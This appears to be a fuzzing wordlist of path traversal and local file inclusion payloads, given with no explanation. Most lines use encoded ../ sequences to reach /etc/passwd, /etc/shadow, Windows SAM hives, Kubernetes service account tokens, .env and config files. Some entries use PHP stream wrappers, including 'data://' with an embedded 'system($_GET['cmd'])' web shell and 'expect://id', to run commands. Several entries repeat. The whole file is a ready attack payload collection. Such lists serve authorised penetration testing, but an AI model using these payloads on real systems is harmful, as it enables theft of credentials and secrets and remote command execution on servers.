""
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/etc/passwd
etc/passwd
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
C:\Windows\win.ini
C:/Windows/win.ini
../../etc/hosts
../../../../etc/hosts
%2e%2e%2fetc%2fhosts
../../../../var/log/auth.log
../../../../var/www/html/index.php
../../../proc/self/environ
../../../../proc/self/cmdline
../../../../boot.ini
..\..\..\..\boot.ini
../../../../etc/shadow
../../etc/passwd%00
../../etc/shadow%00
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fshadow
..%5c..%2fetc%2fpasswd
..%2f..%5cetc%5cpasswd
%C0%AE%C0%AE%2Fetc%2Fpasswd
%C0%AE%C0%AE%C0%AFetc%C0%AE%C0%AE%C0%AFpasswd
\\\\127.0.0.1\\c$\\Windows\\win.ini
php://filter/convert.base64-encode/resource=../../config.php
php://filter/read=convert.base64-encode/resource=../../.env
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../var/log/auth.log
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../boot.ini
../../../../etc/hosts
../../../../../../../..//etc/passwd
../../../../../../../..\\etc\\passwd
..%c0%af..%c0%afetc%c0%afpasswd
%2e%2e%5c%5cetc%5cpasswd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..././..././etc/passwd
....//....//etc/passwd
..?.//etc/passwd
..%00../etc/passwd
/etc/passwd%23
/etc/passwd%3f
/etc/passwd?%00
/etc/passwd%26
/etc/passwd%20
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../var/log/auth.log
../../../../var/log/secure
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../etc/hosts
../../../../etc/shadow
../../../../etc/group
../../../../etc/passwd‐ (with weird dash)
\\\\127.0.0.1\\c$\\Windows\\win.ini
file:///C:/Windows/win.ini
file://C:/Windows/System32/config/SAM
../../../../Windows/System32/drivers/etc/hosts
..\\..\\..\\..\\Windows\\System32\\config\\SAM
php://filter/convert.base64-encode/resource=../../.env
php://filter/read=convert.base64-encode/resource=../../config.php
compress.zlib://../../.env
zlib://../../.env
ogg://../../.env
data://text/plain,<?php phpinfo();?>
expect://id
phar://../../etc/passwd
dict://../../.env
glob://../../*.php
/composer.json
/package.json
/env
/.env
/bootstrap/app.php
/bootstrap/config.php
/app/etc/local.xml
/app/etc/config.xml
/WEB-INF/web.xml
/WEB-INF/appcontext.xml
/.git/config
/.htaccess
/web.config
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c1%1c%1c%5cetc%5cpasswd
..%2f..%5cetc%2fpasswd
..%5c..%2fetc%5cpasswd
%2e%2e%2f%2e%2e%252e%252e%252fetc%252fpasswd
%uff0e%uff0e/%uff0e%uff0e/etc/passwd
../../etc/passwd%2500.jpg
../../etc/passwd%00.png
\\\\?\\C:\\Windows\\win.ini
\\\\?\\UNC\\127.0.0.1\\C$\\Windows\\win.ini
php://filter/convert.iconv.UTF-8.UTF-16LE//resource=../../config.php
expect://id%0a/etc/passwd
zip://../../backup.zip%23passwd
../../../../var/run/docker.sock
../../../../../var/run/docker.sock
../../../../var/run/secrets/kubernetes.io/serviceaccount/token
../../../../etc/docker/daemon.json
../../../../etc/nginx/nginx.conf
../../../../etc/ssh/sshd_config
../../../../var/log/mysql/error.log
../../../../var/log/mysql/mysql.log
../../../../var/log/messages
../../../../etc/fstab
../../../../etc/issue
../../../../proc/version
../../../../WEB-INF/classes/config.properties
../../../../WEB-INF/lib/web.xml
../../../../WEB-INF/web.xml
.%2e/%2e%2e/%2e%2e/etc/passwd
.%c0%2e/%c0%2e%2e/%c0%2e%2e/etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5cwindows%5cwin.ini
.%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%2e/%c0%2e%2e/%c0%2e%2e/etc/passwd
%uff0e%uff0e/%uff0e%uff0e/etc/passwd
..%u2215..%u2215etc%u2215passwd
..%u002e/%u002e%u002e/%u002e%u002e/etc/passwd
..%c1%1c..%c1%1cetc%c1%1cpasswd
..%e0%80%af../etc/passwd
..%e0%80%af../..%e0%80%af/etc/shadow
%252e%252e%255cwindows%255cwin.ini
....//....//....//etc/passwd
..././..././..././etc/passwd
../etc/passwd%2500
../etc/shadow%2500
../etc/passwd%23
../etc/shadow%23
php://filter/convert.base64-decode/resource=../../config.php
zlib://../../.env
compress.bzip2://../../.env
data://text/plain,<?php system($_GET['cmd']);?>
expect://echo
phar://archive.phar/../../etc/passwd
glob://../../*.log
../../../../../../var/www/.env
../../../proc/self/fd/0
../../../../../proc/self/fd/1
../../../../../proc/self/fd/2
../../../../../dev/log/nginx/error.log
../../../../../dev/log/nginx/access.log
../../../dev/shm/secret.txt
../../../../../../etc/shells
../../../../../sys/kernel/debug/tracing/trace
../../../../../sys/kernel/debug/tracing/events
../../../../../sys/kernel/debug/tracing/available_filter_functions
../../../../../proc/self/maps
../../../../../proc/self/mounts
../../../../../proc/self/status
../../../../../proc/self/cgroup
../../../../../proc/1/environ
../../../../../proc/1/cmdline
../../../../../var/run/utmp
../../../../../var/run/wtmp
../../../../../var/run/lastlog
../../../../../var/log/boot.log
../../../../../var/log/messages
../../../../../var/log/cron
../../../../../var/log/maillog
../../../../../var/log/mail.log
../../../../../etc/apache2/apache2.conf
../../../../../etc/nginx/nginx.conf
../../../../../etc/ssh/ssh_config
..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts
..\\..\\..\\Windows\\System32\\config\\SAM
..\\..\\..\\Windows\\System32\\config\\SECURITY
..\\..\\..\\Windows\\System32\\config\\SYSTEM
..\\..\\..\\Windows\\System32\\config\\DEFAULT